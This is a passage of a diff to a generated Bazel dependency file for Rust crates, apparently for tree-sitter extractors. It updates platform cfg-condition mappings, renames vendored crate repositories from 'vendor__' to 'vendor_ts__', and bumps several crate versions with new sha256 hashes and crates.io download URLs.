"@rules_rust//rust/platform:x86_64-unknown-nixos-gnu"], "cfg(all(target_arch = \"aarch64\", target_env = \"msvc\", not(windows_raw_dylib)))": ["@rules_rust//rust/platform:aarch64-pc-windows-msvc"], "cfg(all(target_arch = \"wasm32\", target_os = \"unknown\"))": ["@rules_rust//rust/platform:wasm32-unknown-unknown"], + "cfg(all(target_arch = \"wasm32\", target_os = \"wasi\", target_env = \"p2\"))": [], "cfg(all(target_arch = \"x86\", target_env = \"gnu\", not(target_abi = \"llvm\"), not(windows_raw_dylib)))": ["@rules_rust//rust/platform:i686-unknown-linux-gnu"], "cfg(all(target_arch = \"x86\", target_env = \"gnu\", not(windows_raw_dylib)))": ["@rules_rust//rust/platform:i686-unknown-linux-gnu"], "cfg(all(target_arch = \"x86\", target_env = \"msvc\", not(windows_raw_dylib)))": ["@rules_rust//rust/platform:i686-pc-windows-msvc"], "cfg(all(target_arch = \"x86_64\", target_env = \"gnu\", not(target_abi = \"llvm\"), not(windows_raw_dylib)))": ["@rules_rust//rust/platform:x86_64-unknown-linux-gnu", "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu"], "cfg(all(target_arch = \"x86_64\", target_env = \"msvc\", not(windows_raw_dylib)))": ["@rules_rust//rust/platform:x86_64-pc-windows-msvc"], - "cfg(any(target_os = \"freebsd\", target_os = \"openbsd\", target_os = \"netbsd\", target_os = \"dragonflybsd\"))": ["@rules_rust//rust/platform:i686-unknown-freebsd", "@rules_rust//rust/platform:x86_64-unknown-freebsd"], + "cfg(all(windows, not(target_vendor = \"win7\")))": ["@rules_rust//rust/platform:aarch64-pc-windows-msvc", "@rules_rust//rust/platform:i686-pc-windows-msvc", "@rules_rust//rust/platform:x86_64-pc-windows-msvc"], + "cfg(any())": [], + "cfg(any(target_os = \"dragonfly\", target_os = \"freebsd\", target_os = \"hurd\", target_os = \"illumos\", all(target_os = \"horizon\", target_arch = \"arm\")))": ["@rules_rust//rust/platform:i686-unknown-freebsd", "@rules_rust//rust/platform:x86_64-unknown-freebsd"], + "cfg(any(target_os = \"freebsd\", target_os = \"openbsd\", target_os = \"netbsd\", target_os = \"dragonflybsd\", target_os = \"ios\"))": ["@rules_rust//rust/platform:aarch64-apple-ios", "@rules_rust//rust/platform:aarch64-apple-ios-sim", "@rules_rust//rust/platform:i686-unknown-freebsd", "@rules_rust//rust/platform:x86_64-apple-ios", "@rules_rust//rust/platform:x86_64-unknown-freebsd"], + "cfg(any(target_os = \"haiku\", target_os = \"redox\", target_os = \"nto\", target_os = \"aix\"))": ["@rules_rust//rust/platform:aarch64-unknown-nto-qnx710"], + "cfg(any(target_os = \"ios\", target_os = \"visionos\", target_os = \"watchos\", target_os = \"tvos\"))": ["@rules_rust//rust/platform:aarch64-apple-ios", "@rules_rust//rust/platform:aarch64-apple-ios-sim", "@rules_rust//rust/platform:x86_64-apple-ios"], "cfg(any(target_os = \"linux\", target_os = \"android\"))": ["@rules_rust//rust/platform:aarch64-linux-android", "@rules_rust//rust/platform:aarch64-unknown-linux-gnu", "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu", "@rules_rust//rust/platform:arm-unknown-linux-gnueabi", "@rules_rust//rust/platform:armv7-linux-androideabi", "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi", "@rules_rust//rust/platform:i686-linux-android", "@rules_rust//rust/platform:i686-unknown-linux-gnu", "@rules_rust//rust/platform:powerpc-unknown-linux-gnu", "@rules_rust//rust/platform:s390x-unknown-linux-gnu", "@rules_rust//rust/platform:x86_64-linux-android", "@rules_rust//rust/platform:x86_64-unknown-linux-gnu", "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu"], "cfg(any(target_os = \"macos\", target_os = \"ios\"))": ["@rules_rust//rust/platform:aarch64-apple-darwin", "@rules_rust//rust/platform:aarch64-apple-ios", "@rules_rust//rust/platform:aarch64-apple-ios-sim", "@rules_rust//rust/platform:i686-apple-darwin", "@rules_rust//rust/platform:x86_64-apple-darwin", "@rules_rust//rust/platform:x86_64-apple-ios"], + "cfg(any(target_os = \"macos\", target_os = \"openbsd\", target_os = \"vita\", target_os = \"emscripten\"))": ["@rules_rust//rust/platform:aarch64-apple-darwin", "@rules_rust//rust/platform:i686-apple-darwin", "@rules_rust//rust/platform:x86_64-apple-darwin"], "cfg(any(target_pointer_width = \"8\", target_pointer_width = \"16\", target_pointer_width = \"32\"))": ["@rules_rust//rust/platform:arm-unknown-linux-gnueabi", "@rules_rust//rust/platform:armv7-linux-androideabi", "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi", "@rules_rust//rust/platform:i686-apple-darwin", "@rules_rust//rust/platform:i686-linux-android", "@rules_rust//rust/platform:i686-pc-windows-msvc", "@rules_rust//rust/platform:i686-unknown-freebsd", "@rules_rust//rust/platform:i686-unknown-linux-gnu", "@rules_rust//rust/platform:powerpc-unknown-linux-gnu", "@rules_rust//rust/platform:riscv32imc-unknown-none-elf", "@rules_rust//rust/platform:thumbv7em-none-eabi", "@rules_rust//rust/platform:thumbv8m.main-none-eabi", "@rules_rust//rust/platform:wasm32-unknown-unknown", "@rules_rust//rust/platform:wasm32-wasip1"], "cfg(not(windows))": ["@rules_rust//rust/platform:aarch64-apple-darwin", "@rules_rust//rust/platform:aarch64-apple-ios", "@rules_rust//rust/platform:aarch64-apple-ios-sim", "@rules_rust//rust/platform:aarch64-linux-android", "@rules_rust//rust/platform:aarch64-unknown-fuchsia", "@rules_rust//rust/platform:aarch64-unknown-linux-gnu", "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu", "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710", "@rules_rust//rust/platform:aarch64-unknown-uefi", "@rules_rust//rust/platform:arm-unknown-linux-gnueabi", "@rules_rust//rust/platform:armv7-linux-androideabi", "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi", "@rules_rust//rust/platform:i686-apple-darwin", "@rules_rust//rust/platform:i686-linux-android", "@rules_rust//rust/platform:i686-unknown-freebsd", "@rules_rust//rust/platform:i686-unknown-linux-gnu", "@rules_rust//rust/platform:powerpc-unknown-linux-gnu", "@rules_rust//rust/platform:riscv32imc-unknown-none-elf", "@rules_rust//rust/platform:riscv64gc-unknown-none-elf", "@rules_rust//rust/platform:s390x-unknown-linux-gnu", "@rules_rust//rust/platform:thumbv7em-none-eabi", "@rules_rust//rust/platform:thumbv8m.main-none-eabi", "@rules_rust//rust/platform:wasm32-unknown-unknown", "@rules_rust//rust/platform:wasm32-wasip1", "@rules_rust//rust/platform:x86_64-apple-darwin", "@rules_rust//rust/platform:x86_64-apple-ios", "@rules_rust//rust/platform:x86_64-linux-android", "@rules_rust//rust/platform:x86_64-unknown-freebsd", "@rules_rust//rust/platform:x86_64-unknown-fuchsia", "@rules_rust//rust/platform:x86_64-unknown-linux-gnu", "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu", "@rules_rust//rust/platform:x86_64-unknown-none", "@rules_rust//rust/platform:x86_64-unknown-uefi"], "cfg(target_os = \"android\")": ["@rules_rust//rust/platform:aarch64-linux-android", "@rules_rust//rust/platform:armv7-linux-androideabi", "@rules_rust//rust/platform:i686-linux-android", "@rules_rust//rust/platform:x86_64-linux-android"], @@ -601,7 +609,10 @@ _CONDITIONS = { "cfg(target_os = \"hermit\")": [], "cfg(target_os = \"linux\")": ["@rules_rust//rust/platform:aarch64-unknown-linux-gnu", "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu", "@rules_rust//rust/platform:arm-unknown-linux-gnueabi", "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi", "@rules_rust//rust/platform:i686-unknown-linux-gnu", "@rules_rust//rust/platform:powerpc-unknown-linux-gnu", "@rules_rust//rust/platform:s390x-unknown-linux-gnu", "@rules_rust//rust/platform:x86_64-unknown-linux-gnu", "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu"], "cfg(target_os = \"macos\")": ["@rules_rust//rust/platform:aarch64-apple-darwin", "@rules_rust//rust/platform:i686-apple-darwin", "@rules_rust//rust/platform:x86_64-apple-darwin"], + "cfg(target_os = \"netbsd\")": [], "cfg(target_os = \"redox\")": [], + "cfg(target_os = \"solaris\")": [], + "cfg(target_os = \"vxworks\")": [], "cfg(target_os = \"wasi\")": ["@rules_rust//rust/platform:wasm32-wasip1"], "cfg(target_os = \"windows\")": ["@rules_rust//rust/platform:aarch64-pc-windows-msvc", "@rules_rust//rust/platform:i686-pc-windows-msvc", "@rules_rust//rust/platform:x86_64-pc-windows-msvc"], "cfg(unix)": ["@rules_rust//rust/platform:aarch64-apple-darwin", "@rules_rust//rust/platform:aarch64-apple-ios", "@rules_rust//rust/platform:aarch64-apple-ios-sim", "@rules_rust//rust/platform:aarch64-linux-android", "@rules_rust//rust/platform:aarch64-unknown-fuchsia", "@rules_rust//rust/platform:aarch64-unknown-linux-gnu", "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu", "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710", "@rules_rust//rust/platform:arm-unknown-linux-gnueabi", "@rules_rust//rust/platform:armv7-linux-androideabi", "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi", "@rules_rust//rust/platform:i686-apple-darwin", "@rules_rust//rust/platform:i686-linux-android", "@rules_rust//rust/platform:i686-unknown-freebsd", "@rules_rust//rust/platform:i686-unknown-linux-gnu", "@rules_rust//rust/platform:powerpc-unknown-linux-gnu", "@rules_rust//rust/platform:s390x-unknown-linux-gnu", "@rules_rust//rust/platform:x86_64-apple-darwin", "@rules_rust//rust/platform:x86_64-apple-ios", "@rules_rust//rust/platform:x86_64-linux-android", "@rules_rust//rust/platform:x86_64-unknown-freebsd", "@rules_rust//rust/platform:x86_64-unknown-fuchsia", "@rules_rust//rust/platform:x86_64-unknown-linux-gnu", "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu"], @@ -645,7 +656,7 @@ def crate_repositories(): """ maybe( http_archive, - name = "vendor__adler2-2.0.0", + name = "vendor_ts__adler2-2.0.0", sha256 = "512761e0bb2578dd7380c6baaa0f4ce03e84f95e960231d1dec8bf4d7d6e2627", type = "tar.gz", urls = ["https://static.crates.io/crates/adler2/2.0.0/download"], @@ -655,7 +666,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__aho-corasick-1.1.3", + name = "vendor_ts__aho-corasick-1.1.3", sha256 = "8e60d3430d3a69478ad0993f19238d2df97c507009a52b3c10addcd7f6bcb916", type = "tar.gz", urls = ["https://static.crates.io/crates/aho-corasick/1.1.3/download"], @@ -665,7 +676,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__always-assert-0.2.0", + name = "vendor_ts__always-assert-0.2.0", sha256 = "a1078fa1ce1e34b1872d8611ad921196d76bdd7027e949fbe31231abde201892", type = "tar.gz", urls = ["https://static.crates.io/crates/always-assert/0.2.0/download"], @@ -675,7 +686,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__android-tzdata-0.1.1", + name = "vendor_ts__android-tzdata-0.1.1", sha256 = "e999941b234f3131b00bc13c22d06e8c5ff726d1b6318ac7eb276997bbb4fef0", type = "tar.gz", urls = ["https://static.crates.io/crates/android-tzdata/0.1.1/download"], @@ -685,7 +696,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__android_system_properties-0.1.5", + name = "vendor_ts__android_system_properties-0.1.5", sha256 = "819e7219dbd41043ac279b19830f2efc897156490d7fd6ea916720117ee66311", type = "tar.gz", urls = ["https://static.crates.io/crates/android_system_properties/0.1.5/download"], @@ -695,7 +706,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__anstream-0.6.18", + name = "vendor_ts__anstream-0.6.18", sha256 = "8acc5369981196006228e28809f761875c0327210a891e941f4c683b3a99529b", type = "tar.gz", urls = ["https://static.crates.io/crates/anstream/0.6.18/download"], @@ -705,7 +716,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__anstyle-1.0.10", + name = "vendor_ts__anstyle-1.0.10", sha256 = "55cc3b69f167a1ef2e161439aa98aed94e6028e5f9a59be9a6ffb47aef1651f9", type = "tar.gz", urls = ["https://static.crates.io/crates/anstyle/1.0.10/download"], @@ -715,7 +726,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__anstyle-parse-0.2.6", + name = "vendor_ts__anstyle-parse-0.2.6", sha256 = "3b2d16507662817a6a20a9ea92df6652ee4f94f914589377d69f3b21bc5798a9", type = "tar.gz", urls = ["https://static.crates.io/crates/anstyle-parse/0.2.6/download"], @@ -725,7 +736,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__anstyle-query-1.1.2", + name = "vendor_ts__anstyle-query-1.1.2", sha256 = "79947af37f4177cfead1110013d678905c37501914fba0efea834c3fe9a8d60c", type = "tar.gz", urls = ["https://static.crates.io/crates/anstyle-query/1.1.2/download"], @@ -735,27 +746,27 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__anstyle-wincon-3.0.6", - sha256 = "2109dbce0e72be3ec00bed26e6a7479ca384ad226efdd66db8fa2e3a38c83125", + name = "vendor_ts__anstyle-wincon-3.0.7", + sha256 = "ca3534e77181a9cc07539ad51f2141fe32f6c3ffd4df76db8ad92346b003ae4e", type = "tar.gz", - urls = ["https://static.crates.io/crates/anstyle-wincon/3.0.6/download"], - strip_prefix = "anstyle-wincon-3.0.6", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.anstyle-wincon-3.0.6.bazel"), + urls = ["https://static.crates.io/crates/anstyle-wincon/3.0.7/download"], + strip_prefix = "anstyle-wincon-3.0.7", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.anstyle-wincon-3.0.7.bazel"), ) maybe( http_archive, - name = "vendor__anyhow-1.0.95", - sha256 = "34ac096ce696dc2fcabef30516bb13c0a68a11d30131d3df6f04711467681b04", + name = "vendor_ts__anyhow-1.0.96", + sha256 = "6b964d184e89d9b6b67dd2715bc8e74cf3107fb2b529990c90cf517326150bf4", type = "tar.gz", - urls = ["https://static.crates.io/crates/anyhow/1.0.95/download"], - strip_prefix = "anyhow-1.0.95", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.anyhow-1.0.95.bazel"), + urls = ["https://static.crates.io/crates/anyhow/1.0.96/download"], + strip_prefix = "anyhow-1.0.96", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.anyhow-1.0.96.bazel"), ) maybe( http_archive, - name = "vendor__argfile-0.2.1", + name = "vendor_ts__argfile-0.2.1", sha256 = "0a1cc0ba69de57db40674c66f7cf2caee3981ddef084388482c95c0e2133e5e8", type = "tar.gz", urls = ["https://static.crates.io/crates/argfile/0.2.1/download"], @@ -765,7 +776,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__arrayvec-0.7.6", + name = "vendor_ts__arrayvec-0.7.6", sha256 = "7c02d123df017efcdfbd739ef81735b36c5ba83ec3c59c80a9d7ecc718f92e50", type = "tar.gz", urls = ["https://static.crates.io/crates/arrayvec/0.7.6/download"], @@ -775,7 +786,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__atomic-0.6.0", + name = "vendor_ts__atomic-0.6.0", sha256 = "8d818003e740b63afc82337e3160717f4f63078720a810b7b903e70a5d1d2994", type = "tar.gz", urls = ["https://static.crates.io/crates/atomic/0.6.0/download"], @@ -785,7 +796,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__autocfg-1.4.0", + name = "vendor_ts__autocfg-1.4.0", sha256 = "ace50bade8e6234aa140d9a2f552bbee1db4d353f69b8217bc503490fc1a9f26", type = "tar.gz", urls = ["https://static.crates.io/crates/autocfg/1.4.0/download"], @@ -795,7 +806,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__base64-0.22.1", + name = "vendor_ts__base64-0.22.1", sha256 = "72b3254f16251a8381aa12e40e3c4d2f0199f8c6508fbecb9d91f575e0fbb8c6", type = "tar.gz", urls = ["https://static.crates.io/crates/base64/0.22.1/download"], @@ -805,7 +816,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__bitflags-1.3.2", + name = "vendor_ts__bitflags-1.3.2", sha256 = "bef38d45163c2f1dde094a7dfd33ccf595c92905c8f8f4fdc18d06fb1037718a", type = "tar.gz", urls = ["https://static.crates.io/crates/bitflags/1.3.2/download"], @@ -815,17 +826,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__bitflags-2.7.0", - sha256 = "1be3f42a67d6d345ecd59f675f3f012d6974981560836e938c22b424b85ce1be", + name = "vendor_ts__bitflags-2.8.0", + sha256 = "8f68f53c83ab957f72c32642f3868eec03eb974d1fb82e453128456482613d36", type = "tar.gz", - urls = ["https://static.crates.io/crates/bitflags/2.7.0/download"], - strip_prefix = "bitflags-2.7.0", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.bitflags-2.7.0.bazel"), + urls = ["https://static.crates.io/crates/bitflags/2.8.0/download"], + strip_prefix = "bitflags-2.8.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.bitflags-2.8.0.bazel"), ) maybe( http_archive, - name = "vendor__borsh-1.5.3", + name = "vendor_ts__borsh-1.5.3", sha256 = "2506947f73ad44e344215ccd6403ac2ae18cd8e046e581a441bf8d199f257f03", type = "tar.gz", urls = ["https://static.crates.io/crates/borsh/1.5.3/download"], @@ -835,7 +846,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__bstr-1.11.3", + name = "vendor_ts__bstr-1.11.3", sha256 = "531a9155a481e2ee699d4f98f43c0ca4ff8ee1bfd55c31e9e98fb29d2b176fe0", type = "tar.gz", urls = ["https://static.crates.io/crates/bstr/1.11.3/download"], @@ -845,7 +856,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__bumpalo-3.16.0", + name = "vendor_ts__bumpalo-3.16.0", sha256 = "79296716171880943b8470b5f8d03aa55eb2e645a4874bdbb28adb49162e012c", type = "tar.gz", urls = ["https://static.crates.io/crates/bumpalo/3.16.0/download"], @@ -855,7 +866,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__bytemuck-1.21.0", + name = "vendor_ts__bytemuck-1.21.0", sha256 = "ef657dfab802224e671f5818e9a4935f9b1957ed18e58292690cc39e7a4092a3", type = "tar.gz", urls = ["https://static.crates.io/crates/bytemuck/1.21.0/download"], @@ -865,7 +876,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__byteorder-1.5.0", + name = "vendor_ts__byteorder-1.5.0", sha256 = "1fd0f2584146f6f2ef48085050886acf353beff7305ebd1ae69500e27c67f64b", type = "tar.gz", urls = ["https://static.crates.io/crates/byteorder/1.5.0/download"], @@ -875,7 +886,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__camino-1.1.9", + name = "vendor_ts__camino-1.1.9", sha256 = "8b96ec4966b5813e2c0507c1f86115c8c5abaadc3980879c3424042a02fd1ad3", type = "tar.gz", urls = ["https://static.crates.io/crates/camino/1.1.9/download"], @@ -885,7 +896,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__cargo-platform-0.1.9", + name = "vendor_ts__cargo-platform-0.1.9", sha256 = "e35af189006b9c0f00a064685c727031e3ed2d8020f7ba284d78cc2671bd36ea", type = "tar.gz", urls = ["https://static.crates.io/crates/cargo-platform/0.1.9/download"], @@ -895,7 +906,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__cargo_metadata-0.18.1", + name = "vendor_ts__cargo_metadata-0.18.1", sha256 = "2d886547e41f740c616ae73108f6eb70afe6d940c7bc697cb30f13daec073037", type = "tar.gz", urls = ["https://static.crates.io/crates/cargo_metadata/0.18.1/download"], @@ -905,7 +916,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__cc-1.2.7", + name = "vendor_ts__cc-1.2.7", sha256 = "a012a0df96dd6d06ba9a1b29d6402d1a5d77c6befd2566afdc26e10603dc93d7", type = "tar.gz", urls = ["https://static.crates.io/crates/cc/1.2.7/download"], @@ -915,7 +926,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__cfg-if-1.0.0", + name = "vendor_ts__cfg-if-1.0.0", sha256 = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd", type = "tar.gz", urls = ["https://static.crates.io/crates/cfg-if/1.0.0/download"], @@ -925,7 +936,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__cfg_aliases-0.2.1", + name = "vendor_ts__cfg_aliases-0.2.1", sha256 = "613afe47fcd5fac7ccf1db93babcb082c5994d996f20b8b159f2ad1658eb5724", type = "tar.gz", urls = ["https://static.crates.io/crates/cfg_aliases/0.2.1/download"], @@ -935,47 +946,47 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__chalk-derive-0.98.0", - sha256 = "9426c8fd0fe61c3da880b801d3b510524df17843a8f9ec1f5b9cec24fb7412df", + name = "vendor_ts__chalk-derive-0.99.0", + sha256 = "572583d9b97f9d277e5c7607f8239a30e2e04d3ed3b47c87d1cb2152ae724073", type = "tar.gz", - urls = ["https://static.crates.io/crates/chalk-derive/0.98.0/download"], - strip_prefix = "chalk-derive-0.98.0", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.chalk-derive-0.98.0.bazel"), + urls = ["https://static.crates.io/crates/chalk-derive/0.99.0/download"], + strip_prefix = "chalk-derive-0.99.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.chalk-derive-0.99.0.bazel"), ) maybe( http_archive, - name = "vendor__chalk-ir-0.98.0", - sha256 = "d5f2eb1cd6054da221bd1ac0197fb2fe5e2caf3dcb93619398fc1433f8f09093", + name = "vendor_ts__chalk-ir-0.99.0", + sha256 = "e60e0ef9c81dce1336a9ed3c76f08775f5b623151d96d85ba45f7b10de76d1c7", type = "tar.gz", - urls = ["https://static.crates.io/crates/chalk-ir/0.98.0/download"], - strip_prefix = "chalk-ir-0.98.0", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.chalk-ir-0.98.0.bazel"), + urls = ["https://static.crates.io/crates/chalk-ir/0.99.0/download"], + strip_prefix = "chalk-ir-0.99.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.chalk-ir-0.99.0.bazel"), ) maybe( http_archive, - name = "vendor__chalk-recursive-0.98.0", - sha256 = "129dc03458f71cfb9c3cd621c9c68166a94e87b85b16ccd29af015d7ff9a1c61", + name = "vendor_ts__chalk-recursive-0.99.0", + sha256 = "5a06350d614e22b03a69b8105e3541614450a7ea48bc58ecc6c6bd92731a3995", type = "tar.gz", - urls = ["https://static.crates.io/crates/chalk-recursive/0.98.0/download"], - strip_prefix = "chalk-recursive-0.98.0", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.chalk-recursive-0.98.0.bazel"), + urls = ["https://static.crates.io/crates/chalk-recursive/0.99.0/download"], + strip_prefix = "chalk-recursive-0.99.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.chalk-recursive-0.99.0.bazel"), ) maybe( http_archive, - name = "vendor__chalk-solve-0.98.0", - sha256 = "d7e8a8c1e928f98cdf227b868416ef21dcd8cc3c61b347576d783713444d41c8", + name = "vendor_ts__chalk-solve-0.99.0", + sha256 = "0e428761e9b55bee516bfe2457caed8b6d1b86353f92ae825bbe438a36ce91e8", type = "tar.gz", - urls = ["https://static.crates.io/crates/chalk-solve/0.98.0/download"], - strip_prefix = "chalk-solve-0.98.0", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.chalk-solve-0.98.0.bazel"), + urls = ["https://static.crates.io/crates/chalk-solve/0.99.0/download"], + strip_prefix = "chalk-solve-0.99.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.chalk-solve-0.99.0.bazel"), ) maybe( http_archive, - name = "vendor__chrono-0.4.39", + name = "vendor_ts__chrono-0.4.39", sha256 = "7e36cc9d416881d2e24f9a963be5fb1cd90966419ac844274161d10488b3e825", type = "tar.gz", urls = ["https://static.crates.io/crates/chrono/0.4.39/download"], @@ -985,37 +996,37 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__clap-4.5.26", - sha256 = "a8eb5e908ef3a6efbe1ed62520fb7287959888c88485abe072543190ecc66783", + name = "vendor_ts__clap-4.5.31", + sha256 = "027bb0d98429ae334a8698531da7077bdf906419543a35a55c2cb1b66437d767", type = "tar.gz", - urls = ["https://static.crates.io/crates/clap/4.5.26/download"], - strip_prefix = "clap-4.5.26", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.clap-4.5.26.bazel"), + urls = ["https://static.crates.io/crates/clap/4.5.31/download"], + strip_prefix = "clap-4.5.31", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.clap-4.5.31.bazel"), ) maybe( http_archive, - name = "vendor__clap_builder-4.5.26", - sha256 = "96b01801b5fc6a0a232407abc821660c9c6d25a1cafc0d4f85f29fb8d9afc121", + name = "vendor_ts__clap_builder-4.5.31", + sha256 = "5589e0cba072e0f3d23791efac0fd8627b49c829c196a492e88168e6a669d863", type = "tar.gz", - urls = ["https://static.crates.io/crates/clap_builder/4.5.26/download"], - strip_prefix = "clap_builder-4.5.26", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.clap_builder-4.5.26.bazel"), + urls = ["https://static.crates.io/crates/clap_builder/4.5.31/download"], + strip_prefix = "clap_builder-4.5.31", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.clap_builder-4.5.31.bazel"), ) maybe( http_archive, - name = "vendor__clap_derive-4.5.24", - sha256 = "54b755194d6389280185988721fffba69495eed5ee9feeee9a599b53db80318c", + name = "vendor_ts__clap_derive-4.5.28", + sha256 = "bf4ced95c6f4a675af3da73304b9ac4ed991640c36374e4b46795c49e17cf1ed", type = "tar.gz", - urls = ["https://static.crates.io/crates/clap_derive/4.5.24/download"], - strip_prefix = "clap_derive-4.5.24", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.clap_derive-4.5.24.bazel"), + urls = ["https://static.crates.io/crates/clap_derive/4.5.28/download"], + strip_prefix = "clap_derive-4.5.28", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.clap_derive-4.5.28.bazel"), ) maybe( http_archive, - name = "vendor__clap_lex-0.7.4", + name = "vendor_ts__clap_lex-0.7.4", sha256 = "f46ad14479a25103f283c0f10005961cf086d8dc42205bb44c46ac563475dca6", type = "tar.gz", urls = ["https://static.crates.io/crates/clap_lex/0.7.4/download"], @@ -1025,7 +1036,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__colorchoice-1.0.3", + name = "vendor_ts__colorchoice-1.0.3", sha256 = "5b63caa9aa9397e2d9480a9b13673856c78d8ac123288526c37d7839f2a86990", type = "tar.gz", urls = ["https://static.crates.io/crates/colorchoice/1.0.3/download"], @@ -1035,7 +1046,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__core-foundation-sys-0.8.7", + name = "vendor_ts__core-foundation-sys-0.8.7", sha256 = "773648b94d0e5d620f64f280777445740e61fe701025087ec8b57f45c791888b", type = "tar.gz", urls = ["https://static.crates.io/crates/core-foundation-sys/0.8.7/download"], @@ -1045,7 +1056,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__countme-3.0.1", + name = "vendor_ts__countme-3.0.1", sha256 = "7704b5fdd17b18ae31c4c1da5a2e0305a2bf17b5249300a9ee9ed7b72114c636", type = "tar.gz", urls = ["https://static.crates.io/crates/countme/3.0.1/download"], @@ -1055,7 +1066,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__cov-mark-2.0.0", + name = "vendor_ts__cov-mark-2.0.0", sha256 = "0570650661aa447e7335f1d5e4f499d8e58796e617bedc9267d971e51c8b49d4", type = "tar.gz", urls = ["https://static.crates.io/crates/cov-mark/2.0.0/download"], @@ -1065,7 +1076,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__crc32fast-1.4.2", + name = "vendor_ts__crc32fast-1.4.2", sha256 = "a97769d94ddab943e4510d138150169a2758b5ef3eb191a9ee688de3e23ef7b3", type = "tar.gz", urls = ["https://static.crates.io/crates/crc32fast/1.4.2/download"], @@ -1075,7 +1086,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__crossbeam-channel-0.5.14", + name = "vendor_ts__crossbeam-channel-0.5.14", sha256 = "06ba6d68e24814cb8de6bb986db8222d3a027d15872cabc0d18817bc3c0e4471", type = "tar.gz", urls = ["https://static.crates.io/crates/crossbeam-channel/0.5.14/download"], @@ -1085,7 +1096,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__crossbeam-deque-0.8.6", + name = "vendor_ts__crossbeam-deque-0.8.6", sha256 = "9dd111b7b7f7d55b72c0a6ae361660ee5853c9af73f70c3c2ef6858b950e2e51", type = "tar.gz", urls = ["https://static.crates.io/crates/crossbeam-deque/0.8.6/download"], @@ -1095,7 +1106,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__crossbeam-epoch-0.9.18", + name = "vendor_ts__crossbeam-epoch-0.9.18", sha256 = "5b82ac4a3c2ca9c3460964f020e1402edd5753411d7737aa39c3714ad1b5420e", type = "tar.gz", urls = ["https://static.crates.io/crates/crossbeam-epoch/0.9.18/download"], @@ -1105,7 +1116,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__crossbeam-utils-0.8.21", + name = "vendor_ts__crossbeam-utils-0.8.21", sha256 = "d0a5c400df2834b80a4c3327b3aad3a4c4cd4de0629063962b03235697506a28", type = "tar.gz", urls = ["https://static.crates.io/crates/crossbeam-utils/0.8.21/download"], @@ -1115,7 